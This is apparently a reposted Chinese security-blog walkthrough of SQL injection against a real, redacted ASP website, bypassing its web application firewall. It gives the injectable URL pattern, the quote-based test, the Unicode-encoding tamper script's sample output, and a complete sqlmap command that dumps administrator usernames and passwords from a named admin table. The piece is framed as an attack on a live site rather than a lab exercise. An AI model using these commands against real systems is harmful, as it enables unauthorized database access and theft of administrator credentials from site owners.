实战绕过智创防火墙sql注入

  • A+
所属分类:安全文章

实战绕过智创防火墙sql注入


目标站:http://www.xxxxx.com/
http://www.xxxxx.com/shangmao/artmore.asp?id=48514 存在报错型注入,也存在cookie注入

http://www.xxxxx.com/shangmao/artmore.asp?id=48514  后面加个或者“ ‘判断


拿去sqlmap注入,突破注入用tamper脚本下的charunicodeencode.py ,都是编码绕过的,我就用字符串 unicode 编码

Example:   * Input: SELECT FIELD%20FROM TABLE   * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ 

Requirement:

  • ASP

  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000

  • Microsoft SQL Server 2005

  • MySQL 5.1.56

  • PostgreSQL 9.0.3

sqlmap.py -u http://www.xxxxx.com/shangmao/artmore.asp

 --cookie "id=48514" --level 2 -D hunangyxcb_com_2014 -T applenews_admin_info -C

 "adminname,adminpass" --dump --threads=10  --tamper=charunicodeencode.py -v 


参数慢慢去领悟,,,,,

实战绕过智创防火墙sql注入

实战绕过智创防火墙sql注入




本文始发于微信公众号(飓风网络安全):实战绕过智创防火墙sql注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: